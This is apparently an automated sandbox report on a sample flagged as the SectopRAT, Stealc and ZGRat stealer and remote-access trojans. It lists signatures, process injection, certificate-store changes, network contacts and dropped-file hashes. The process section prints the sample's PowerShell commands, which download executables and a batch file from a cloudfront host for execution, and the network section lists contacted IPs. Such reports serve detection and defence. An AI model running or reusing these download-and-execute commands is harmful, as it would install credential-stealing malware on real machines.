Malware Analysis Report

2024-12-08 01:39

Sample ID 240428-bq4dqsch49
Target 705685a8deace858e7fc849471c045f3.bin
SHA256 61808802cf5808232043a5659d064395a10953bffe31b4a2807055b59a945b0e
Tags
sectoprat stealc zgrat discovery rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

61808802cf5808232043a5659d064395a10953bffe31b4a2807055b59a945b0e

Threat Level: Known bad

The file 705685a8deace858e7fc849471c045f3.bin was found to be: Known bad.

Malicious Activity Summary

sectoprat stealc zgrat discovery rat spyware stealer trojan

SectopRAT payload

Detect ZGRat V1

ZGRat

Stealc

SectopRAT

Downloads MZ/PE file

Blocklisted process makes network request

Reads data files stored by FTP clients

Reads user/profile data of web browsers

Checks computer location settings

Loads dropped DLL

Executes dropped EXE

Accesses cryptocurrency files/wallets, possible credential harvesting

Checks installed software on the system

Suspicious use of SetThreadContext

Unsigned PE

Enumerates physical storage devices

Program crash

Checks processor information in registry

Suspicious use of SendNotifyMessage

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious use of FindShellTrayWindow

Modifies system certificate store

Suspicious use of SetWindowsHookEx

Suspicious behavior: MapViewOfSection

Checks SCSI registry key(s)

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-04-28 01:21

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-28 01:21

Reported

2024-04-28 01:24

Platform

win7-20240221-en

Max time kernel

119s

Max time network

153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\7ff9182009a077962d7c00b287caaa60fe7888e5d6cf6018c14f967a2441a3f9.exe"

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

Stealc

stealer stealc

ZGRat

rat zgrat

Downloads MZ/PE file

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Checks installed software on the system

discovery

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2612 set thread context of 328 N/A C:\Users\Admin\AppData\Local\Temp\ufw.2\run.exe C:\Windows\SysWOW64\cmd.exe
PID 328 set thread context of 2492 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\ufw.3.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\ufw.3.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\ufw.3.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\ufw.0.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\ufw.0.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A C:\Users\Admin\AppData\Local\Temp\7ff9182009a077962d7c00b287caaa60fe7888e5d6cf6018c14f967a2441a3f9.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = (binary blob data omitted) C:\Users\Admin\AppData\Local\Temp\7ff9182009a077962d7c00b287caaa60fe7888e5d6cf6018c14f967a2441a3f9.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = (binary blob data omitted) C:\Users\Admin\AppData\Local\Temp\7ff9182009a077962d7c00b287caaa60fe7888e5d6cf6018c14f967a2441a3f9.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6 C:\Users\Admin\AppData\Local\Temp\7ff9182009a077962d7c00b287caaa60fe7888e5d6cf6018c14f967a2441a3f9.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = (binary blob data omitted) C:\Users\Admin\AppData\Local\Temp\7ff9182009a077962d7c00b287caaa60fe7888e5d6cf6018c14f967a2441a3f9.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = (binary blob data omitted) C:\Users\Admin\AppData\Local\Temp\7ff9182009a077962d7c00b287caaa60fe7888e5d6cf6018c14f967a2441a3f9.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = (binary blob data omitted) C:\Users\Admin\AppData\Local\Temp\7ff9182009a077962d7c00b287caaa60fe7888e5d6cf6018c14f967a2441a3f9.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\ufw.2\run.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\ufw.2\run.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ufw.2\run.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2240 wrote to memory of 944 N/A C:\Users\Admin\AppData\Local\Temp\7ff9182009a077962d7c00b287caaa60fe7888e5d6cf6018c14f967a2441a3f9.exe C:\Windows\SysWOW64\cmd.exe
PID 2240 wrote to memory of 944 N/A C:\Users\Admin\AppData\Local\Temp\7ff9182009a077962d7c00b287caaa60fe7888e5d6cf6018c14f967a2441a3f9.exe C:\Windows\SysWOW64\cmd.exe
PID 2240 wrote to memory of 944 N/A C:\Users\Admin\AppData\Local\Temp\7ff9182009a077962d7c00b287caaa60fe7888e5d6cf6018c14f967a2441a3f9.exe C:\Windows\SysWOW64\cmd.exe
PID 2240 wrote to memory of 944 N/A C:\Users\Admin\AppData\Local\Temp\7ff9182009a077962d7c00b287caaa60fe7888e5d6cf6018c14f967a2441a3f9.exe C:\Windows\SysWOW64\cmd.exe
PID 944 wrote to memory of 752 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 944 wrote to memory of 752 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 944 wrote to memory of 752 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 944 wrote to memory of 752 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 944 wrote to memory of 1636 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 944 wrote to memory of 1636 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 944 wrote to memory of 1636 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 944 wrote to memory of 1636 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 944 wrote to memory of 572 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\i1.exe
PID 944 wrote to memory of 572 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\i1.exe
PID 944 wrote to memory of 572 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\i1.exe
PID 944 wrote to memory of 572 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\i1.exe
PID 944 wrote to memory of 2212 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 944 wrote to memory of 2212 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 944 wrote to memory of 2212 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 944 wrote to memory of 2212 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 572 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\ufw.0.exe
PID 572 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\ufw.0.exe
PID 572 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\ufw.0.exe
PID 572 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\ufw.0.exe
PID 944 wrote to memory of 2320 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 944 wrote to memory of 2320 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 944 wrote to memory of 2320 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 944 wrote to memory of 2320 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 572 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\ufw.2\run.exe
PID 572 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\ufw.2\run.exe
PID 572 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\ufw.2\run.exe
PID 572 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\ufw.2\run.exe
PID 572 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\ufw.2\run.exe
PID 572 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\ufw.2\run.exe
PID 572 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\ufw.2\run.exe
PID 2612 wrote to memory of 328 N/A C:\Users\Admin\AppData\Local\Temp\ufw.2\run.exe C:\Windows\SysWOW64\cmd.exe
PID 2612 wrote to memory of 328 N/A C:\Users\Admin\AppData\Local\Temp\ufw.2\run.exe C:\Windows\SysWOW64\cmd.exe
PID 2612 wrote to memory of 328 N/A C:\Users\Admin\AppData\Local\Temp\ufw.2\run.exe C:\Windows\SysWOW64\cmd.exe
PID 2612 wrote to memory of 328 N/A C:\Users\Admin\AppData\Local\Temp\ufw.2\run.exe C:\Windows\SysWOW64\cmd.exe
PID 572 wrote to memory of 1532 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\ufw.3.exe
PID 572 wrote to memory of 1532 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\ufw.3.exe
PID 572 wrote to memory of 1532 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\ufw.3.exe
PID 572 wrote to memory of 1532 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\ufw.3.exe
PID 2612 wrote to memory of 328 N/A C:\Users\Admin\AppData\Local\Temp\ufw.2\run.exe C:\Windows\SysWOW64\cmd.exe
PID 1532 wrote to memory of 2800 N/A C:\Users\Admin\AppData\Local\Temp\ufw.3.exe C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
PID 1532 wrote to memory of 2800 N/A C:\Users\Admin\AppData\Local\Temp\ufw.3.exe C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
PID 1532 wrote to memory of 2800 N/A C:\Users\Admin\AppData\Local\Temp\ufw.3.exe C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
PID 1532 wrote to memory of 2800 N/A C:\Users\Admin\AppData\Local\Temp\ufw.3.exe C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
PID 328 wrote to memory of 2492 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 328 wrote to memory of 2492 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 328 wrote to memory of 2492 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 328 wrote to memory of 2492 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 328 wrote to memory of 2492 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 328 wrote to memory of 2492 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Processes

C:\Users\Admin\AppData\Local\Temp\7ff9182009a077962d7c00b287caaa60fe7888e5d6cf6018c14f967a2441a3f9.exe

"C:\Users\Admin\AppData\Local\Temp\7ff9182009a077962d7c00b287caaa60fe7888e5d6cf6018c14f967a2441a3f9.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd" /c "C:\Users\Admin\AppData\Local\Temp\nsy7CBF.tmp\lood.bat"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/th.php?c=1000','stat')"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=425&c=1000','i1.exe')"

C:\Users\Admin\AppData\Local\Temp\i1.exe

i1.exe /SUB=2838 /str=one

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=444', 'i2.bat')"

C:\Users\Admin\AppData\Local\Temp\ufw.0.exe

"C:\Users\Admin\AppData\Local\Temp\ufw.0.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=1667','i3.exe')"

C:\Users\Admin\AppData\Local\Temp\ufw.2\run.exe

"C:\Users\Admin\AppData\Local\Temp\ufw.2\run.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Users\Admin\AppData\Local\Temp\ufw.3.exe

"C:\Users\Admin\AppData\Local\Temp\ufw.3.exe"

C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 d68kcn56pzfb4.cloudfront.net udp
IT 108.138.198.196:443 d68kcn56pzfb4.cloudfront.net tcp
IT 108.138.198.196:443 d68kcn56pzfb4.cloudfront.net tcp
IT 108.138.198.196:443 d68kcn56pzfb4.cloudfront.net tcp
DE 185.172.128.59:80 185.172.128.59 tcp
DE 185.172.128.90:80 185.172.128.90 tcp
IT 108.138.198.196:443 d68kcn56pzfb4.cloudfront.net tcp
DE 185.172.128.228:80 185.172.128.228 tcp
DE 185.172.128.59:80 185.172.128.59 tcp
US 8.8.8.8:53 240216234727901.mjj.xne26.cfd udp
BG 94.156.35.76:80 240216234727901.mjj.xne26.cfd tcp
US 8.8.8.8:53 note.padd.cn.com udp
RO 176.97.76.106:80 note.padd.cn.com tcp
US 8.8.8.8:53 d68kcn56pzfb4.cloudfront.net udp
IT 108.138.198.104:443 d68kcn56pzfb4.cloudfront.net tcp
DE 185.172.128.62:80 185.172.128.62 tcp
DE 185.172.128.228:80 185.172.128.228 tcp
US 8.8.8.8:53 svc.iolo.com udp
US 20.157.87.45:80 svc.iolo.com tcp
US 8.8.8.8:53 download.iolo.net udp
FR 143.244.56.51:80 download.iolo.net tcp
FR 143.244.56.51:443 download.iolo.net tcp
US 20.157.87.45:80 svc.iolo.com tcp
US 8.8.8.8:53 westus2-2.in.applicationinsights.azure.com udp
US 20.9.155.145:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.145:443 westus2-2.in.applicationinsights.azure.com tcp
RU 91.215.85.66:15647 tcp
US 20.9.155.145:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.145:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.145:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.145:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.145:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.145:443 westus2-2.in.applicationinsights.azure.com tcp
US 8.8.8.8:53 westus2-2.in.applicationinsights.azure.com udp
US 20.9.155.148:443 westus2-2.in.applicationinsights.azure.com tcp
US 20.9.155.148:443 westus2-2.in.applicationinsights.azure.com tcp

Files

\Users\Admin\AppData\Local\Temp\nsy7CBF.tmp\INetC.dll

MD5 40d7eca32b2f4d29db98715dd45bfac5
SHA1 124df3f617f562e46095776454e1c0c7bb791cc7
SHA256 85e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9
SHA512 5fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 29f65ba8e88c063813cc50a4ea544e93
SHA1 05a7040d5c127e68c25d81cc51271ffb8bef3568
SHA256 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512 e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

C:\Users\Admin\AppData\Local\Temp\Tar81F5.tmp

MD5 435a9ac180383f9fa094131b173a2f7b
SHA1 76944ea657a9db94f9a4bef38f88c46ed4166983
SHA256 67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34
SHA512 1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c735faf898918225eaaf94251a81ed15
SHA1 fadf5885dcf90dce782b384909a89c6aeede57e9
SHA256 e7819a037c7079f5eb9942599dd55a710748f7e75f4e2ee5f86052cf29e2a448
SHA512 b460f83477ac8807bac8c92c71acf886fde0b6923981cf59fa96c98c7ff04f6f2e7732939098151e813268d97ac472feb8d2a35501b1bbe0141ecbf357914c0f

C:\Users\Admin\AppData\Local\Temp\nsy7CBF.tmp\lood.bat

MD5 75599c4a0c50b789c306880785ffa782
SHA1 31bb898b645b5616b2adf0a4718a9f24ce28e1c1
SHA256 fe26f8ca5512caeff7dffd12c2ffc11115850db0764a3ef9f943fa9f349e0a77
SHA512 b9ea2629a7f212aab59cb7a8bfdb684b1f23086b488b2a28b25784ad629c42dd8e71b4ef4927728df436a53c2f94d66013a166a407bcbc5dd6570c3b03fb31ad

memory/752-162-0x0000000002590000-0x00000000025D0000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 b4ee2d226ec2f920234ac360e43e08a7
SHA1 2e76a2232744732f9c524e7958e33c721e69e036
SHA256 b2715705a557de76fc29b054704e933e4d0d3ad5464b78a7ffc05e0c6df531be
SHA512 aae23494fa5d99bb7abda9f18734f6e061b46f79cc89938cf58a5d4a7c7c4d88df84aa44b37056bd8fa0dde2b033a0409e24f471e404521f4890eb7d4cb0cc18

\Users\Admin\AppData\Local\Temp\i1.exe

MD5 fdd3895eb388f733e4aabd00db54e6f7
SHA1 604978bd31d87066735e13343f26f80ce7f45706
SHA256 303ba93e0bb762a95859f5c94016e7cda0ace2fba811fb78e86af98baa2f3d01
SHA512 6b891f36976ec4f5bd8590215f191c43e93f69c19a83f2eab44ef5b2d17fbecc5531a05c2137c97164f0917bf5a0d41cb245760eb1544d83fa212d4a1d806756

C:\Users\Admin\AppData\Local\Temp\ufw.0.exe

MD5 f85ca7da4201921c93b98f6555f3d7b7
SHA1 523891e3e23bb45a52e402b6282f70f9e17cde9c
SHA256 eeaa177b0bc2d85cf8b416c2ed3b85fd50bd7c811bf41a32d161a10a767c2fda
SHA512 1b8220fe954799fbc43a702a1c508beff390c3f5a58e8e50e3c5ccce48459ec3a25df395f041f722cb67b0eb6c31013239f58a8b947e60344d15ce0c56e9cb17

C:\Users\Admin\AppData\Local\Temp\UFW1~1.ZIP

MD5 78d3ca6355c93c72b494bb6a498bf639
SHA1 2fa4e5df74bfe75c207c881a1b0d3bc1c62c8b0e
SHA256 a1dd547a63b256aa6a16871ed03f8b025226f7617e67b8817a08444df077b001
SHA512 1b2df7bee2514aee7efd3579f5dd33c76b40606d07dba69a34c45747662fad61174db4931bca02b058830107959205e889fee74f8ccc9f6e03f9fd111761f4ea

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Temp\ufw.2\run.exe

MD5 9fb4770ced09aae3b437c1c6eb6d7334
SHA1 fe54b31b0db8665aa5b22bed147e8295afc88a03
SHA256 a05b592a971fe5011554013bcfe9a4aaf9cfc633bdd1fe3a8197f213d557b8d3
SHA512 140fee6daf23fe8b7e441b3b4de83554af804f00ecedc421907a385ac79a63164bd9f28b4be061c2ea2262755d85e14d3a8e7dc910547837b664d78d93667256

C:\Users\Admin\AppData\Local\Temp\ufw.2\relay.dll

MD5 10d51becd0bbce0fab147ff9658c565e
SHA1 4689a18112ff876d3c066bc8c14a08fd6b7b7a4a
SHA256 7b2db9c88f60ed6dd24b1dec321a304564780fdb191a96ec35c051856128f1ed
SHA512 29faf493bb28f7842c905adc5312f31741effb09f841059b53d73b22aea2c4d41d73db10bbf37703d6aeb936ffacbc756a3cc85ba3c0b6a6863ef4d27fefcd29

C:\Users\Admin\AppData\Local\Temp\ufw.2\whale.dbf

MD5 a723bf46048e0bfb15b8d77d7a648c3e
SHA1 8952d3c34e9341e4425571e10f22b782695bb915
SHA256 b440170853bdb43b66497f701aee2901080326975140b095a1669cb9dee13422
SHA512 ca8ea2f7f3c7af21b5673a0a3f2611b6580a7ed02efa2cfd8b343eb644ff09682bde43b25ef7aab68530d5ce31dcbd252c382dd336ecb610d4c4ebde78347273

C:\Users\Admin\AppData\Local\Temp\ufw.2\bunch.dat

MD5 1e8237d3028ab52821d69099e0954f97
SHA1 30a6ae353adda0c471c6ed5b7a2458b07185abf2
SHA256 9387488f9d338e211be2cb45109bf590a5070180bc0d4a703f70d3cb3c4e1742
SHA512 a6406d7c18694ee014d59df581f1f76e980b68e3361ae680dc979606a423eba48d35e37f143154dd97fe5f066baf0ea51a2e9f8bc822d593e1cba70ead6559f3

memory/2612-341-0x00000000745E0000-0x0000000074754000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ufw.2\UIxMarketPlugin.dll

MD5 d1ba9412e78bfc98074c5d724a1a87d6
SHA1 0572f98d78fb0b366b5a086c2a74cc68b771d368
SHA256 cbcea8f28d8916219d1e8b0a8ca2db17e338eb812431bc4ad0cb36c06fd67f15
SHA512 8765de36d3824b12c0a4478c31b985878d4811bd0e5b6fba4ea07f8c76340bd66a2da3490d4871b95d9a12f96efc25507dfd87f431de211664dbe9a9c914af6f

memory/2612-342-0x0000000077B30000-0x0000000077CD9000-memory.dmp

memory/1632-348-0x0000000061E00000-0x0000000061EF3000-memory.dmp

\Users\Admin\AppData\Local\Temp\ufw.3.exe

MD5 397926927bca55be4a77839b1c44de6e
SHA1 e10f3434ef3021c399dbba047832f02b3c898dbd
SHA256 4f07e1095cc915b2d46eb149d1c3be14f3f4b4bd2742517265947fd23bdca5a7
SHA512 cf54136b977fc8af7e8746d78676d0d464362a8cfa2213e392487003b5034562ee802e6911760b98a847bddd36ad664f32d849af84d7e208d4648bd97a2fa954

memory/572-385-0x0000000000400000-0x0000000001A3C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

MD5 4978aebe3b47dbe2dc682524251bf182
SHA1 5caf8904debf79fc69eac04680b5203851d462a0
SHA256 6e0871d2ff7b7795686d230c054b2285c2c0c28ef9f4a3c0f0573b18dab40c7a
SHA512 8410c75818c35e56eb0a148f39b2843f2a5528672d0ee1bf27d93a80707eb9b474db7733603190babd9fdd84b8ae840887e9f7ed605d657ba4690ecff36c24aa

memory/2612-414-0x00000000745E0000-0x0000000074754000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1ebc139a

MD5 b9e1dc3641cb74ed0633561210fd7862
SHA1 c019ab6b2cbafa98539de387a3bd3a8f058bcf68
SHA256 2b35c8d463f1fe09c5de20478aff653e96c01e8261baa4be61cb9c8ec16b7970
SHA512 b597f9f9c8ee759133034e4c3f682d78db7780bd641787ace6a7e3c3709f480018ec54a3ea6659d30db1d0ebe598bab2dc40bfb207d7d37fb7af52e20fc8e341

memory/1632-423-0x0000000000400000-0x000000000083A000-memory.dmp

memory/328-424-0x0000000077B30000-0x0000000077CD9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

MD5 33592882a13cc34ba6fa816ba5924c03
SHA1 c81771a90391e3e187f7a7d4352ac74c12b0d7e2
SHA256 ee79e2fe9637793cffc06c535403ffb032ac5203d2863b267e0067c5504897b7
